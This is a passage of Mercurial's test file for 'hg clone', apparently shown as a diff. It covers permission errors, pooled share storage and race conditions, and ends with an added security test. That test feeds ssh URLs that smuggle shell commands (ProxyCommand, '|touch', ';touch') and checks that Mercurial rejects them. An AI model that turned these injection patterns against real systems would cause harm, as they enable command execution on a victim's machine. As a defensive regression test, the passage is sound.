593 #endif
593 #endif
594 $ rm -rf b # work around bug with http clone
594 $ rm -rf b # work around bug with http clone
595
595
596
596
597 #if unix-permissions no-root
597 #if unix-permissions no-root
598
598
599 Inaccessible source
599 Inaccessible source
600
600
601 $ mkdir a
601 $ mkdir a
602 $ chmod 000 a
602 $ chmod 000 a
603 $ hg clone a b
603 $ hg clone a b
604 abort: repository a not found!
604 abort: repository a not found!
605 [255]
605 [255]
606
606
607 Inaccessible destination
607 Inaccessible destination
608
608
609 $ hg init b
609 $ hg init b
610 $ cd b
610 $ cd b
611 $ hg clone . ../a
611 $ hg clone . ../a
612 abort: Permission denied: '../a'
612 abort: Permission denied: '../a'
613 [255]
613 [255]
614 $ cd ..
614 $ cd ..
615 $ chmod 700 a
615 $ chmod 700 a
616 $ rm -r a b
616 $ rm -r a b
617
617
618 #endif
618 #endif
619
619
620
620
621 #if fifo
621 #if fifo
622
622
623 Source of wrong type
623 Source of wrong type
624
624
625 $ mkfifo a
625 $ mkfifo a
626 $ hg clone a b
626 $ hg clone a b
627 abort: repository a not found!
627 abort: repository a not found!
628 [255]
628 [255]
629 $ rm a
629 $ rm a
630
630
631 #endif
631 #endif
632
632
633 Default destination, same directory
633 Default destination, same directory
634
634
635 $ hg init q
635 $ hg init q
636 $ hg clone q
636 $ hg clone q
637 destination directory: q
637 destination directory: q
638 abort: destination 'q' is not empty
638 abort: destination 'q' is not empty
639 [255]
639 [255]
640
640
641 destination directory not empty
641 destination directory not empty
642
642
643 $ mkdir a
643 $ mkdir a
644 $ echo stuff > a/a
644 $ echo stuff > a/a
645 $ hg clone q a
645 $ hg clone q a
646 abort: destination 'a' is not empty
646 abort: destination 'a' is not empty
647 [255]
647 [255]
648
648
649
649
650 #if unix-permissions no-root
650 #if unix-permissions no-root
651
651
652 leave existing directory in place after clone failure
652 leave existing directory in place after clone failure
653
653
654 $ hg init c
654 $ hg init c
655 $ cd c
655 $ cd c
656 $ echo c > c
656 $ echo c > c
657 $ hg commit -A -m test
657 $ hg commit -A -m test
658 adding c
658 adding c
659 $ chmod -rx .hg/store/data
659 $ chmod -rx .hg/store/data
660 $ cd ..
660 $ cd ..
661 $ mkdir d
661 $ mkdir d
662 $ hg clone c d 2> err
662 $ hg clone c d 2> err
663 [255]
663 [255]
664 $ test -d d
664 $ test -d d
665 $ test -d d/.hg
665 $ test -d d/.hg
666 [1]
666 [1]
667
667
668 re-enable perm to allow deletion
668 re-enable perm to allow deletion
669
669
670 $ chmod +rx c/.hg/store/data
670 $ chmod +rx c/.hg/store/data
671
671
672 #endif
672 #endif
673
673
674 $ cd ..
674 $ cd ..
675
675
676 Test clone from the repository in (emulated) revlog format 0 (issue4203):
676 Test clone from the repository in (emulated) revlog format 0 (issue4203):
677
677
678 $ mkdir issue4203
678 $ mkdir issue4203
679 $ mkdir -p src/.hg
679 $ mkdir -p src/.hg
680 $ echo foo > src/foo
680 $ echo foo > src/foo
681 $ hg -R src add src/foo
681 $ hg -R src add src/foo
682 $ hg -R src commit -m '#0'
682 $ hg -R src commit -m '#0'
683 $ hg -R src log -q
683 $ hg -R src log -q
684 0:e1bab28bca43
684 0:e1bab28bca43
685 $ hg clone -U -q src dst
685 $ hg clone -U -q src dst
686 $ hg -R dst log -q
686 $ hg -R dst log -q
687 0:e1bab28bca43
687 0:e1bab28bca43
688
688
689 Create repositories to test auto sharing functionality
689 Create repositories to test auto sharing functionality
690
690
691 $ cat >> $HGRCPATH << EOF
691 $ cat >> $HGRCPATH << EOF
692 > [extensions]
692 > [extensions]
693 > share=
693 > share=
694 > EOF
694 > EOF
695
695
696 $ hg init empty
696 $ hg init empty
697 $ hg init source1a
697 $ hg init source1a
698 $ cd source1a
698 $ cd source1a
699 $ echo initial1 > foo
699 $ echo initial1 > foo
700 $ hg -q commit -A -m initial
700 $ hg -q commit -A -m initial
701 $ echo second > foo
701 $ echo second > foo
702 $ hg commit -m second
702 $ hg commit -m second
703 $ cd ..
703 $ cd ..
704
704
705 $ hg init filteredrev0
705 $ hg init filteredrev0
706 $ cd filteredrev0
706 $ cd filteredrev0
707 $ cat >> .hg/hgrc << EOF
707 $ cat >> .hg/hgrc << EOF
708 > [experimental]
708 > [experimental]
709 > evolution=createmarkers
709 > evolution=createmarkers
710 > EOF
710 > EOF
711 $ echo initial1 > foo
711 $ echo initial1 > foo
712 $ hg -q commit -A -m initial0
712 $ hg -q commit -A -m initial0
713 $ hg -q up -r null
713 $ hg -q up -r null
714 $ echo initial2 > foo
714 $ echo initial2 > foo
715 $ hg -q commit -A -m initial1
715 $ hg -q commit -A -m initial1
716 $ hg debugobsolete c05d5c47a5cf81401869999f3d05f7d699d2b29a e082c1832e09a7d1e78b7fd49a592d372de854c8
716 $ hg debugobsolete c05d5c47a5cf81401869999f3d05f7d699d2b29a e082c1832e09a7d1e78b7fd49a592d372de854c8
717 obsoleted 1 changesets
717 obsoleted 1 changesets
718 $ cd ..
718 $ cd ..
719
719
720 $ hg -q clone --pull source1a source1b
720 $ hg -q clone --pull source1a source1b
721 $ cd source1a
721 $ cd source1a
722 $ hg bookmark bookA
722 $ hg bookmark bookA
723 $ echo 1a > foo
723 $ echo 1a > foo
724 $ hg commit -m 1a
724 $ hg commit -m 1a
725 $ cd ../source1b
725 $ cd ../source1b
726 $ hg -q up -r 0
726 $ hg -q up -r 0
727 $ echo head1 > foo
727 $ echo head1 > foo
728 $ hg commit -m head1
728 $ hg commit -m head1
729 created new head
729 created new head
730 $ hg bookmark head1
730 $ hg bookmark head1
731 $ hg -q up -r 0
731 $ hg -q up -r 0
732 $ echo head2 > foo
732 $ echo head2 > foo
733 $ hg commit -m head2
733 $ hg commit -m head2
734 created new head
734 created new head
735 $ hg bookmark head2
735 $ hg bookmark head2
736 $ hg -q up -r 0
736 $ hg -q up -r 0
737 $ hg branch branch1
737 $ hg branch branch1
738 marked working directory as branch branch1
738 marked working directory as branch branch1
739 (branches are permanent and global, did you want a bookmark?)
739 (branches are permanent and global, did you want a bookmark?)
740 $ echo branch1 > foo
740 $ echo branch1 > foo
741 $ hg commit -m branch1
741 $ hg commit -m branch1
742 $ hg -q up -r 0
742 $ hg -q up -r 0
743 $ hg branch branch2
743 $ hg branch branch2
744 marked working directory as branch branch2
744 marked working directory as branch branch2
745 $ echo branch2 > foo
745 $ echo branch2 > foo
746 $ hg commit -m branch2
746 $ hg commit -m branch2
747 $ cd ..
747 $ cd ..
748 $ hg init source2
748 $ hg init source2
749 $ cd source2
749 $ cd source2
750 $ echo initial2 > foo
750 $ echo initial2 > foo
751 $ hg -q commit -A -m initial2
751 $ hg -q commit -A -m initial2
752 $ echo second > foo
752 $ echo second > foo
753 $ hg commit -m second
753 $ hg commit -m second
754 $ cd ..
754 $ cd ..
755
755
756 Clone with auto share from an empty repo should not result in share
756 Clone with auto share from an empty repo should not result in share
757
757
758 $ mkdir share
758 $ mkdir share
759 $ hg --config share.pool=share clone empty share-empty
759 $ hg --config share.pool=share clone empty share-empty
760 (not using pooled storage: remote appears to be empty)
760 (not using pooled storage: remote appears to be empty)
761 updating to branch default
761 updating to branch default
762 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
762 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
763 $ ls share
763 $ ls share
764 $ test -d share-empty/.hg/store
764 $ test -d share-empty/.hg/store
765 $ test -f share-empty/.hg/sharedpath
765 $ test -f share-empty/.hg/sharedpath
766 [1]
766 [1]
767
767
768 Clone with auto share from a repo with filtered revision 0 should not result in share
768 Clone with auto share from a repo with filtered revision 0 should not result in share
769
769
770 $ hg --config share.pool=share clone filteredrev0 share-filtered
770 $ hg --config share.pool=share clone filteredrev0 share-filtered
771 (not using pooled storage: unable to resolve identity of remote)
771 (not using pooled storage: unable to resolve identity of remote)
772 requesting all changes
772 requesting all changes
773 adding changesets
773 adding changesets
774 adding manifests
774 adding manifests
775 adding file changes
775 adding file changes
776 added 1 changesets with 1 changes to 1 files
776 added 1 changesets with 1 changes to 1 files
777 updating to branch default
777 updating to branch default
778 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
778 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
779
779
780 Clone from repo with content should result in shared store being created
780 Clone from repo with content should result in shared store being created
781
781
782 $ hg --config share.pool=share clone source1a share-dest1a
782 $ hg --config share.pool=share clone source1a share-dest1a
783 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
783 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
784 requesting all changes
784 requesting all changes
785 adding changesets
785 adding changesets
786 adding manifests
786 adding manifests
787 adding file changes
787 adding file changes
788 added 3 changesets with 3 changes to 1 files
788 added 3 changesets with 3 changes to 1 files
789 searching for changes
789 searching for changes
790 no changes found
790 no changes found
791 adding remote bookmark bookA
791 adding remote bookmark bookA
792 updating working directory
792 updating working directory
793 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
793 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
794
794
795 The shared repo should have been created
795 The shared repo should have been created
796
796
797 $ ls share
797 $ ls share
798 b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1
798 b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1
799
799
800 The destination should point to it
800 The destination should point to it
801
801
802 $ cat share-dest1a/.hg/sharedpath; echo
802 $ cat share-dest1a/.hg/sharedpath; echo
803 $TESTTMP/share/b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1/.hg (glob)
803 $TESTTMP/share/b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1/.hg (glob)
804
804
805 The destination should have bookmarks
805 The destination should have bookmarks
806
806
807 $ hg -R share-dest1a bookmarks
807 $ hg -R share-dest1a bookmarks
808 bookA 2:e5bfe23c0b47
808 bookA 2:e5bfe23c0b47
809
809
810 The default path should be the remote, not the share
810 The default path should be the remote, not the share
811
811
812 $ hg -R share-dest1a config paths.default
812 $ hg -R share-dest1a config paths.default
813 $TESTTMP/source1a (glob)
813 $TESTTMP/source1a (glob)
814
814
815 Clone with existing share dir should result in pull + share
815 Clone with existing share dir should result in pull + share
816
816
817 $ hg --config share.pool=share clone source1b share-dest1b
817 $ hg --config share.pool=share clone source1b share-dest1b
818 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
818 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
819 searching for changes
819 searching for changes
820 adding changesets
820 adding changesets
821 adding manifests
821 adding manifests
822 adding file changes
822 adding file changes
823 added 4 changesets with 4 changes to 1 files (+4 heads)
823 added 4 changesets with 4 changes to 1 files (+4 heads)
824 adding remote bookmark head1
824 adding remote bookmark head1
825 adding remote bookmark head2
825 adding remote bookmark head2
826 updating working directory
826 updating working directory
827 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
827 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
828
828
829 $ ls share
829 $ ls share
830 b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1
830 b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1
831
831
832 $ cat share-dest1b/.hg/sharedpath; echo
832 $ cat share-dest1b/.hg/sharedpath; echo
833 $TESTTMP/share/b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1/.hg (glob)
833 $TESTTMP/share/b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1/.hg (glob)
834
834
835 We only get bookmarks from the remote, not everything in the share
835 We only get bookmarks from the remote, not everything in the share
836
836
837 $ hg -R share-dest1b bookmarks
837 $ hg -R share-dest1b bookmarks
838 head1 3:4a8dc1ab4c13
838 head1 3:4a8dc1ab4c13
839 head2 4:99f71071f117
839 head2 4:99f71071f117
840
840
841 Default path should be source, not share.
841 Default path should be source, not share.
842
842
843 $ hg -R share-dest1b config paths.default
843 $ hg -R share-dest1b config paths.default
844 $TESTTMP/source1b (glob)
844 $TESTTMP/source1b (glob)
845
845
846 Checked out revision should be head of default branch
846 Checked out revision should be head of default branch
847
847
848 $ hg -R share-dest1b log -r .
848 $ hg -R share-dest1b log -r .
849 changeset: 4:99f71071f117
849 changeset: 4:99f71071f117
850 bookmark: head2
850 bookmark: head2
851 parent: 0:b5f04eac9d8f
851 parent: 0:b5f04eac9d8f
852 user: test
852 user: test
853 date: Thu Jan 01 00:00:00 1970 +0000
853 date: Thu Jan 01 00:00:00 1970 +0000
854 summary: head2
854 summary: head2
855
855
856
856
857 Clone from unrelated repo should result in new share
857 Clone from unrelated repo should result in new share
858
858
859 $ hg --config share.pool=share clone source2 share-dest2
859 $ hg --config share.pool=share clone source2 share-dest2
860 (sharing from new pooled repository 22aeff664783fd44c6d9b435618173c118c3448e)
860 (sharing from new pooled repository 22aeff664783fd44c6d9b435618173c118c3448e)
861 requesting all changes
861 requesting all changes
862 adding changesets
862 adding changesets
863 adding manifests
863 adding manifests
864 adding file changes
864 adding file changes
865 added 2 changesets with 2 changes to 1 files
865 added 2 changesets with 2 changes to 1 files
866 searching for changes
866 searching for changes
867 no changes found
867 no changes found
868 updating working directory
868 updating working directory
869 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
869 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
870
870
871 $ ls share
871 $ ls share
872 22aeff664783fd44c6d9b435618173c118c3448e
872 22aeff664783fd44c6d9b435618173c118c3448e
873 b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1
873 b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1
874
874
875 remote naming mode works as advertised
875 remote naming mode works as advertised
876
876
877 $ hg --config share.pool=shareremote --config share.poolnaming=remote clone source1a share-remote1a
877 $ hg --config share.pool=shareremote --config share.poolnaming=remote clone source1a share-remote1a
878 (sharing from new pooled repository 195bb1fcdb595c14a6c13e0269129ed78f6debde)
878 (sharing from new pooled repository 195bb1fcdb595c14a6c13e0269129ed78f6debde)
879 requesting all changes
879 requesting all changes
880 adding changesets
880 adding changesets
881 adding manifests
881 adding manifests
882 adding file changes
882 adding file changes
883 added 3 changesets with 3 changes to 1 files
883 added 3 changesets with 3 changes to 1 files
884 searching for changes
884 searching for changes
885 no changes found
885 no changes found
886 adding remote bookmark bookA
886 adding remote bookmark bookA
887 updating working directory
887 updating working directory
888 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
888 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
889
889
890 $ ls shareremote
890 $ ls shareremote
891 195bb1fcdb595c14a6c13e0269129ed78f6debde
891 195bb1fcdb595c14a6c13e0269129ed78f6debde
892
892
893 $ hg --config share.pool=shareremote --config share.poolnaming=remote clone source1b share-remote1b
893 $ hg --config share.pool=shareremote --config share.poolnaming=remote clone source1b share-remote1b
894 (sharing from new pooled repository c0d4f83847ca2a873741feb7048a45085fd47c46)
894 (sharing from new pooled repository c0d4f83847ca2a873741feb7048a45085fd47c46)
895 requesting all changes
895 requesting all changes
896 adding changesets
896 adding changesets
897 adding manifests
897 adding manifests
898 adding file changes
898 adding file changes
899 added 6 changesets with 6 changes to 1 files (+4 heads)
899 added 6 changesets with 6 changes to 1 files (+4 heads)
900 searching for changes
900 searching for changes
901 no changes found
901 no changes found
902 adding remote bookmark head1
902 adding remote bookmark head1
903 adding remote bookmark head2
903 adding remote bookmark head2
904 updating working directory
904 updating working directory
905 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
905 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
906
906
907 $ ls shareremote
907 $ ls shareremote
908 195bb1fcdb595c14a6c13e0269129ed78f6debde
908 195bb1fcdb595c14a6c13e0269129ed78f6debde
909 c0d4f83847ca2a873741feb7048a45085fd47c46
909 c0d4f83847ca2a873741feb7048a45085fd47c46
910
910
911 request to clone a single revision is respected in sharing mode
911 request to clone a single revision is respected in sharing mode
912
912
913 $ hg --config share.pool=sharerevs clone -r 4a8dc1ab4c13 source1b share-1arev
913 $ hg --config share.pool=sharerevs clone -r 4a8dc1ab4c13 source1b share-1arev
914 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
914 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
915 adding changesets
915 adding changesets
916 adding manifests
916 adding manifests
917 adding file changes
917 adding file changes
918 added 2 changesets with 2 changes to 1 files
918 added 2 changesets with 2 changes to 1 files
919 no changes found
919 no changes found
920 adding remote bookmark head1
920 adding remote bookmark head1
921 updating working directory
921 updating working directory
922 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
922 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
923
923
924 $ hg -R share-1arev log -G
924 $ hg -R share-1arev log -G
925 @ changeset: 1:4a8dc1ab4c13
925 @ changeset: 1:4a8dc1ab4c13
926 | bookmark: head1
926 | bookmark: head1
927 | tag: tip
927 | tag: tip
928 | user: test
928 | user: test
929 | date: Thu Jan 01 00:00:00 1970 +0000
929 | date: Thu Jan 01 00:00:00 1970 +0000
930 | summary: head1
930 | summary: head1
931 |
931 |
932 o changeset: 0:b5f04eac9d8f
932 o changeset: 0:b5f04eac9d8f
933 user: test
933 user: test
934 date: Thu Jan 01 00:00:00 1970 +0000
934 date: Thu Jan 01 00:00:00 1970 +0000
935 summary: initial
935 summary: initial
936
936
937
937
938 making another clone should only pull down requested rev
938 making another clone should only pull down requested rev
939
939
940 $ hg --config share.pool=sharerevs clone -r 99f71071f117 source1b share-1brev
940 $ hg --config share.pool=sharerevs clone -r 99f71071f117 source1b share-1brev
941 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
941 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
942 searching for changes
942 searching for changes
943 adding changesets
943 adding changesets
944 adding manifests
944 adding manifests
945 adding file changes
945 adding file changes
946 added 1 changesets with 1 changes to 1 files (+1 heads)
946 added 1 changesets with 1 changes to 1 files (+1 heads)
947 adding remote bookmark head1
947 adding remote bookmark head1
948 adding remote bookmark head2
948 adding remote bookmark head2
949 updating working directory
949 updating working directory
950 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
950 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
951
951
952 $ hg -R share-1brev log -G
952 $ hg -R share-1brev log -G
953 @ changeset: 2:99f71071f117
953 @ changeset: 2:99f71071f117
954 | bookmark: head2
954 | bookmark: head2
955 | tag: tip
955 | tag: tip
956 | parent: 0:b5f04eac9d8f
956 | parent: 0:b5f04eac9d8f
957 | user: test
957 | user: test
958 | date: Thu Jan 01 00:00:00 1970 +0000
958 | date: Thu Jan 01 00:00:00 1970 +0000
959 | summary: head2
959 | summary: head2
960 |
960 |
961 | o changeset: 1:4a8dc1ab4c13
961 | o changeset: 1:4a8dc1ab4c13
962 |/ bookmark: head1
962 |/ bookmark: head1
963 | user: test
963 | user: test
964 | date: Thu Jan 01 00:00:00 1970 +0000
964 | date: Thu Jan 01 00:00:00 1970 +0000
965 | summary: head1
965 | summary: head1
966 |
966 |
967 o changeset: 0:b5f04eac9d8f
967 o changeset: 0:b5f04eac9d8f
968 user: test
968 user: test
969 date: Thu Jan 01 00:00:00 1970 +0000
969 date: Thu Jan 01 00:00:00 1970 +0000
970 summary: initial
970 summary: initial
971
971
972
972
973 Request to clone a single branch is respected in sharing mode
973 Request to clone a single branch is respected in sharing mode
974
974
975 $ hg --config share.pool=sharebranch clone -b branch1 source1b share-1bbranch1
975 $ hg --config share.pool=sharebranch clone -b branch1 source1b share-1bbranch1
976 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
976 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
977 adding changesets
977 adding changesets
978 adding manifests
978 adding manifests
979 adding file changes
979 adding file changes
980 added 2 changesets with 2 changes to 1 files
980 added 2 changesets with 2 changes to 1 files
981 no changes found
981 no changes found
982 updating working directory
982 updating working directory
983 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
983 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
984
984
985 $ hg -R share-1bbranch1 log -G
985 $ hg -R share-1bbranch1 log -G
986 o changeset: 1:5f92a6c1a1b1
986 o changeset: 1:5f92a6c1a1b1
987 | branch: branch1
987 | branch: branch1
988 | tag: tip
988 | tag: tip
989 | user: test
989 | user: test
990 | date: Thu Jan 01 00:00:00 1970 +0000
990 | date: Thu Jan 01 00:00:00 1970 +0000
991 | summary: branch1
991 | summary: branch1
992 |
992 |
993 @ changeset: 0:b5f04eac9d8f
993 @ changeset: 0:b5f04eac9d8f
994 user: test
994 user: test
995 date: Thu Jan 01 00:00:00 1970 +0000
995 date: Thu Jan 01 00:00:00 1970 +0000
996 summary: initial
996 summary: initial
997
997
998
998
999 $ hg --config share.pool=sharebranch clone -b branch2 source1b share-1bbranch2
999 $ hg --config share.pool=sharebranch clone -b branch2 source1b share-1bbranch2
1000 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1000 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1001 searching for changes
1001 searching for changes
1002 adding changesets
1002 adding changesets
1003 adding manifests
1003 adding manifests
1004 adding file changes
1004 adding file changes
1005 added 1 changesets with 1 changes to 1 files (+1 heads)
1005 added 1 changesets with 1 changes to 1 files (+1 heads)
1006 updating working directory
1006 updating working directory
1007 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1007 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1008
1008
1009 $ hg -R share-1bbranch2 log -G
1009 $ hg -R share-1bbranch2 log -G
1010 o changeset: 2:6bacf4683960
1010 o changeset: 2:6bacf4683960
1011 | branch: branch2
1011 | branch: branch2
1012 | tag: tip
1012 | tag: tip
1013 | parent: 0:b5f04eac9d8f
1013 | parent: 0:b5f04eac9d8f
1014 | user: test
1014 | user: test
1015 | date: Thu Jan 01 00:00:00 1970 +0000
1015 | date: Thu Jan 01 00:00:00 1970 +0000
1016 | summary: branch2
1016 | summary: branch2
1017 |
1017 |
1018 | o changeset: 1:5f92a6c1a1b1
1018 | o changeset: 1:5f92a6c1a1b1
1019 |/ branch: branch1
1019 |/ branch: branch1
1020 | user: test
1020 | user: test
1021 | date: Thu Jan 01 00:00:00 1970 +0000
1021 | date: Thu Jan 01 00:00:00 1970 +0000
1022 | summary: branch1
1022 | summary: branch1
1023 |
1023 |
1024 @ changeset: 0:b5f04eac9d8f
1024 @ changeset: 0:b5f04eac9d8f
1025 user: test
1025 user: test
1026 date: Thu Jan 01 00:00:00 1970 +0000
1026 date: Thu Jan 01 00:00:00 1970 +0000
1027 summary: initial
1027 summary: initial
1028
1028
1029
1029
1030 -U is respected in share clone mode
1030 -U is respected in share clone mode
1031
1031
1032 $ hg --config share.pool=share clone -U source1a share-1anowc
1032 $ hg --config share.pool=share clone -U source1a share-1anowc
1033 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1033 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1034 searching for changes
1034 searching for changes
1035 no changes found
1035 no changes found
1036 adding remote bookmark bookA
1036 adding remote bookmark bookA
1037
1037
1038 $ ls share-1anowc
1038 $ ls share-1anowc
1039
1039
1040 Test that auto sharing doesn't cause failure of "hg clone local remote"
1040 Test that auto sharing doesn't cause failure of "hg clone local remote"
1041
1041
1042 $ cd $TESTTMP
1042 $ cd $TESTTMP
1043 $ hg -R a id -r 0
1043 $ hg -R a id -r 0
1044 acb14030fe0a
1044 acb14030fe0a
1045 $ hg id -R remote -r 0
1045 $ hg id -R remote -r 0
1046 abort: repository remote not found!
1046 abort: repository remote not found!
1047 [255]
1047 [255]
1048 $ hg --config share.pool=share -q clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" a ssh://user@dummy/remote
1048 $ hg --config share.pool=share -q clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" a ssh://user@dummy/remote
1049 $ hg -R remote id -r 0
1049 $ hg -R remote id -r 0
1050 acb14030fe0a
1050 acb14030fe0a
1051
1051
1052 Cloning into pooled storage doesn't race (issue5104)
1052 Cloning into pooled storage doesn't race (issue5104)
1053
1053
1054 $ HGPOSTLOCKDELAY=2.0 hg --config share.pool=racepool --config extensions.lockdelay=$TESTDIR/lockdelay.py clone source1a share-destrace1 > race1.log 2>&1 &
1054 $ HGPOSTLOCKDELAY=2.0 hg --config share.pool=racepool --config extensions.lockdelay=$TESTDIR/lockdelay.py clone source1a share-destrace1 > race1.log 2>&1 &
1055 $ HGPRELOCKDELAY=1.0 hg --config share.pool=racepool --config extensions.lockdelay=$TESTDIR/lockdelay.py clone source1a share-destrace2 > race2.log 2>&1
1055 $ HGPRELOCKDELAY=1.0 hg --config share.pool=racepool --config extensions.lockdelay=$TESTDIR/lockdelay.py clone source1a share-destrace2 > race2.log 2>&1
1056 $ wait
1056 $ wait
1057
1057
1058 $ hg -R share-destrace1 log -r tip
1058 $ hg -R share-destrace1 log -r tip
1059 changeset: 2:e5bfe23c0b47
1059 changeset: 2:e5bfe23c0b47
1060 bookmark: bookA
1060 bookmark: bookA
1061 tag: tip
1061 tag: tip
1062 user: test
1062 user: test
1063 date: Thu Jan 01 00:00:00 1970 +0000
1063 date: Thu Jan 01 00:00:00 1970 +0000
1064 summary: 1a
1064 summary: 1a
1065
1065
1066
1066
1067 $ hg -R share-destrace2 log -r tip
1067 $ hg -R share-destrace2 log -r tip
1068 changeset: 2:e5bfe23c0b47
1068 changeset: 2:e5bfe23c0b47
1069 bookmark: bookA
1069 bookmark: bookA
1070 tag: tip
1070 tag: tip
1071 user: test
1071 user: test
1072 date: Thu Jan 01 00:00:00 1970 +0000
1072 date: Thu Jan 01 00:00:00 1970 +0000
1073 summary: 1a
1073 summary: 1a
1074
1074
1075 One repo should be new, the other should be shared from the pool. We
1075 One repo should be new, the other should be shared from the pool. We
1076 don't care which is which, so we just make sure we always print the
1076 don't care which is which, so we just make sure we always print the
1077 one containing "new pooled" first, then one one containing "existing
1077 one containing "new pooled" first, then one one containing "existing
1078 pooled".
1078 pooled".
1079
1079
1080 $ (grep 'new pooled' race1.log > /dev/null && cat race1.log || cat race2.log) | grep -v lock
1080 $ (grep 'new pooled' race1.log > /dev/null && cat race1.log || cat race2.log) | grep -v lock
1081 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1081 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1082 requesting all changes
1082 requesting all changes
1083 adding changesets
1083 adding changesets
1084 adding manifests
1084 adding manifests
1085 adding file changes
1085 adding file changes
1086 added 3 changesets with 3 changes to 1 files
1086 added 3 changesets with 3 changes to 1 files
1087 searching for changes
1087 searching for changes
1088 no changes found
1088 no changes found
1089 adding remote bookmark bookA
1089 adding remote bookmark bookA
1090 updating working directory
1090 updating working directory
1091 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1091 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1092
1092
1093 $ (grep 'existing pooled' race1.log > /dev/null && cat race1.log || cat race2.log) | grep -v lock
1093 $ (grep 'existing pooled' race1.log > /dev/null && cat race1.log || cat race2.log) | grep -v lock
1094 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1094 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1095 searching for changes
1095 searching for changes
1096 no changes found
1096 no changes found
1097 adding remote bookmark bookA
1097 adding remote bookmark bookA
1098 updating working directory
1098 updating working directory
1099 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1099 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1100
1101 SEC: check for unsafe ssh url
1102
1103 $ cat >> $HGRCPATH << EOF
1104 > [ui]
1105 > ssh = sh -c "read l; read l; read l"
1106 > EOF
1107
1108 $ hg clone 'ssh://-oProxyCommand=touch${IFS}owned/path'
1109 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
1110 [255]
1111 $ hg clone 'ssh://%2DoProxyCommand=touch${IFS}owned/path'
1112 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
1113 [255]
1114 $ hg clone 'ssh://fakehost|touch%20owned/path'
1115 abort: no suitable response from remote hg!
1116 [255]
1117 $ hg clone 'ssh://fakehost%7Ctouch%20owned/path'
1118 abort: no suitable response from remote hg!
1119 [255]
1120
1121 $ hg clone 'ssh://-oProxyCommand=touch owned%20foo@example.com/nonexistent/path'
1122 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch owned foo@example.com/nonexistent/path'
1123 [255]
1124
1125 #if windows
1126 $ hg clone "ssh://%26touch%20owned%20/" --debug
1127 running sh -c "read l; read l; read l" "&touch owned " "hg -R . serve --stdio"
1128 sending hello command
1129 sending between command
1130 abort: no suitable response from remote hg!
1131 [255]
1132 $ hg clone "ssh://example.com:%26touch%20owned%20/" --debug
1133 running sh -c "read l; read l; read l" -p "&touch owned " example.com "hg -R . serve --stdio"
1134 sending hello command
1135 sending between command
1136 abort: no suitable response from remote hg!
1137 [255]
1138 #else
1139 $ hg clone "ssh://%3btouch%20owned%20/" --debug
1140 running sh -c "read l; read l; read l" ';touch owned ' 'hg -R . serve --stdio'
1141 sending hello command
1142 sending between command
1143 abort: no suitable response from remote hg!
1144 [255]
1145 $ hg clone "ssh://example.com:%3btouch%20owned%20/" --debug
1146 running sh -c "read l; read l; read l" -p ';touch owned ' example.com 'hg -R . serve --stdio'
1147 sending hello command
1148 sending between command
1149 abort: no suitable response from remote hg!
1150 [255]
1151 #endif
1152
